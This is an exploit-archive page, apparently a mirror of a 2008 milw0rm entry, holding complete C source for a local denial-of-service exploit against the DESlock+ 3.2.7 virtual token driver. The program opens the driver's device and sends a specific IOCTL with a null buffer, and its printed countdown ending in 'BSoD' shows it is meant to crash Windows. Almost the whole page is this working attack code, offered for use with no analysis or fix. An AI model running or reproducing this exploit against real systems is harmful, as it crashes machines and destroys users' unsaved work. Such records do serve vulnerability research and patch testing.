DESlock+ 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit

🗓️ 21 Sep 2008 00:00:00Reported by RootType
DESlock+ 3.2.7 Local Denial of Service Exploi

                                                ////////////////////////////////////////////////////////////////////////////////////
// +----------------------------------------------------------------------------+ //
// |                                                                            | //
// | Data Encryption Systems Ltd. - http://www.deslock.com/                     | //
// | Data Encryption Systems DESlock+ - 3.2.7                                   | //
// | DESlock+ Virtual Token Driver - 1.0.2.43 - vdlptokn.sys                    | //
// | DoS Exploit                                                                | //
// |                                                                            | //
// +----------------------------------------------------------------------------+ //
// |                                                                            | //
// | NT Internals - http://www.ntinternals.org/                                 | //
// | alex ntinternals org                                                       | //
// | 21 September 2008                                                          | //
// |                                                                            | //
// +----------------------------------------------------------------------------+ //
////////////////////////////////////////////////////////////////////////////////////

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;windows.h&gt;

#define IMP_VOID __declspec(dllimport) VOID __stdcall
#define IMP_SYSCALL __declspec(dllimport) NTSTATUS __stdcall

#define OBJ_CASE_INSENSITIVE 0x00000040
#define FILE_OPEN_IF 0x00000003

typedef ULONG NTSTATUS;

typedef struct _UNICODE_STRING 
{
    /* 0x00 */ USHORT Length;
    /* 0x02 */ USHORT MaximumLength;
    /* 0x04 */ PWSTR Buffer;
    /* 0x08 */
}
    UNICODE_STRING,
  *PUNICODE_STRING,
**PPUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES
{
    /* 0x00 */ ULONG Length;
    /* 0x04 */ HANDLE RootDirectory;
    /* 0x08 */ PUNICODE_STRING ObjectName;
    /* 0x0C */ ULONG Attributes;
    /* 0x10 */ PSECURITY_DESCRIPTOR SecurityDescriptor;
    /* 0x14 */ PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
    /* 0x18 */
}
    OBJECT_ATTRIBUTES,
  *POBJECT_ATTRIBUTES,
**PPOBJECT_ATTRIBUTES;

typedef struct _IO_STATUS_BLOCK
{ 
    union
    { 
        /* 0x00 */ NTSTATUS Status; 
        /* 0x00 */ PVOID Pointer; 
    }; 

    /* 0x04 */ ULONG Information;
    /* 0x08 */
}
    IO_STATUS_BLOCK,
  *PIO_STATUS_BLOCK,
**PPIO_STATUS_BLOCK;

typedef VOID (NTAPI *PIO_APC_ROUTINE)
(
    IN PVOID ApcContext,
    IN PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG Reserved
);

IMP_VOID RtlInitUnicodeString
(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
);

IMP_VOID RtlFreeUnicodeString
(
    IN PUNICODE_STRING UnicodeString
);

IMP_SYSCALL NtCreateFile
(
    OUT PHANDLE FileHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PLARGE_INTEGER AllocationSize OPTIONAL,
    IN ULONG FileAttributes,
    IN ULONG ShareAccess,
    IN ULONG CreateDisposition,
    IN ULONG CreateOptions,
    IN PVOID EaBuffer OPTIONAL,
    IN ULONG EaLength
);

IMP_SYSCALL NtDeviceIoControlFile
(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG IoControlCode,
    IN PVOID InputBuffer OPTIONAL,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer OPTIONAL,
    IN ULONG OutputBufferLength
);

IMP_SYSCALL NtClose
(
    IN HANDLE Handle
);

IMP_SYSCALL NtDelayExecution
(
    IN BOOLEAN Alertable,
    IN PLARGE_INTEGER Interval
);

int __cdecl main(int argc, char **argv)
{
    NTSTATUS NtStatus;
    
    HANDLE DeviceHandle;
    
    UNICODE_STRING DeviceName;
    OBJECT_ATTRIBUTES ObjectAttributes;
    IO_STATUS_BLOCK IoStatusBlock;
    LARGE_INTEGER Interval;

    ///////////////////////////////////////////////////////////////////////////////////////////////
    
    system(&quot;cls&quot;);
    
    printf( &quot; +----------------------------------------------------------------------------+\n&quot;
            &quot; |                                                                            |\n&quot;
            &quot; | Data Encryption Systems Ltd. - http://www.deslock.com/                     |\n&quot;
            &quot; | Data Encryption Systems DESlock+ - 3.2.7                                   |\n&quot;
            &quot; | DESlock+ Virtual Token Driver - 1.0.2.43 - vdlptokn.sys                    |\n&quot;
            &quot; | DoS Exploit                                                                |\n&quot;
            &quot; |                                                                            |\n&quot;
            &quot; +----------------------------------------------------------------------------+\n&quot;
            &quot; |                                                                            |\n&quot;
            &quot; | NT Internals - http://www.ntinternals.org/                                 |\n&quot;
            &quot; | alex ntinternals org                                                       |\n&quot;
            &quot; | 21 September 2008                                                          |\n&quot;
            &quot; |                                                                            |\n&quot;
            &quot; +----------------------------------------------------------------------------+\n\n&quot;);

    ///////////////////////////////////////////////////////////////////////////////////////////////
    
    RtlInitUnicodeString(&amp;DeviceName, L&quot;\\Device\\DLPTokenWalter0&quot;);

    ObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);
    ObjectAttributes.RootDirectory = 0;
    ObjectAttributes.ObjectName = &amp;DeviceName;
    ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE;
    ObjectAttributes.SecurityDescriptor = NULL;
    ObjectAttributes.SecurityQualityOfService = NULL;

    
    NtStatus = NtCreateFile(
                            &amp;DeviceHandle,                      // FileHandle
                            FILE_READ_DATA | FILE_WRITE_DATA,   // DesiredAccess
                            &amp;ObjectAttributes,                  // ObjectAttributes
                            &amp;IoStatusBlock,                     // IoStatusBlock
                            NULL,                               // AllocationSize OPTIONAL
                            0,                                  // FileAttributes
                            FILE_SHARE_READ | FILE_SHARE_WRITE, // ShareAccess
                            FILE_OPEN_IF,                       // CreateDisposition
                            0,                                  // CreateOptions
                            NULL,                               // EaBuffer OPTIONAL
                            0);                                 // EaLength

    if(NtStatus)
    {
        printf(&quot; [*] NtStatus of NtCreateFile - 0x%.8X\n&quot;, NtStatus);    
        return NtStatus;
    }

    RtlFreeUnicodeString(&amp;DeviceName);

    ///////////////////////////////////////////////////////////////////////////////////////////////

    Interval.LowPart = 0xFF676980;
    Interval.HighPart = 0xFFFFFFFF;

    printf(&quot; 3&quot;);
    NtDelayExecution(FALSE,    &amp;Interval);
    
    printf(&quot; 2&quot;);
    NtDelayExecution(FALSE,    &amp;Interval);

    printf(&quot; 1&quot;);
    NtDelayExecution(FALSE,    &amp;Interval);

    printf(&quot; BSoD\n\n&quot;);
    NtDelayExecution(FALSE,    &amp;Interval);


    NtStatus = NtDeviceIoControlFile(
                                     DeviceHandle,    // FileHandle
                                     NULL,            // Event
                                     NULL,            // ApcRoutine
                                     NULL,            // ApcContext
                                     &amp;IoStatusBlock,  // IoStatusBlock
                                     0x002220C0,      // IoControlCode
                                     NULL,            // InputBuffer
                                     0,               // InputBufferLength
                                     NULL,            // OutputBuffer
                                     0);              // OutBufferLength
    
    if(NtStatus)
    {
        printf(&quot; [*] NtStatus of NtDeviceIoControlFile - 0x%.8X\n&quot;, NtStatus);
        return NtStatus;
    }

    ///////////////////////////////////////////////////////////////////////////////////////////////

    NtStatus = NtClose(DeviceHandle);  // Handle
    
    if(NtStatus)
    {
        printf(&quot; [*] NtStatus of NtClose - 0x%.8X\n&quot;, NtStatus);    
        return NtStatus;
    }
    
    return 0;
}

// milw0rm.com [2008-09-21]
21 Sep 2008 00:00Current
7.1High risk
Vulners AI Score7.1
data encryption systems deslock+vdlptokn.sys dos nt internals ntcreatefile ntdeviceiocontrolfile ntclose